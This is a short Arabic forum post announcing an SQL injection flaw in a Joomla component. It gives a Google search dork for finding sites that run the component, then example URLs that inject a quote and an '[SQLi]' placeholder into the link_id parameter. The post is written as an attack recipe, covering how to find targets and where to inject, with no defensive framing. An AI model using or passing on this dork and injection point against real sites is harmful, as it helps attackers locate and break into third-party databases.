ثغرة في سكربت joomla من نوع SQL Injection


ثغرة في سكربت joomla من نوع SQL Injection

البحث في جوجل :
"Powered by joomla" inurl:link_id

الإستغلال:
كود:
كود:
http://127.0.0.1/?act=story_lists&task=item&link_id=1'
كود:
كود:
http://127.0.0.1/?act=story_lists&task=item&link_id=[SQLi]
كود:
كود:
http://127.0.0.1/path/?act=story_lists&task=item&link_id=[SQLi]